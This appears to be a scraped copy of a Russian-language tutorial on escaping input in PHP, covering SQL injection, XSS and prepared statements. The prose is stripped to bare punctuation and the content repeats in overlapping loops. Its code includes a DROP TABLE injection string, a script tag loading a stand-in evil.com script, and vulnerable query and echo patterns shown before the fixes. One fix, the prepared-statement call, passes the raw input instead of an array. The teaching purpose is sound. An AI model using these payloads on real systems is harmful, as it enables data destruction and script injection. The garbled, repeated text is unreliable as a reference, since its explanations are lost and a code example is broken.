SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-,. , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - "&
", .. : "&<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, .$_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-,. , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).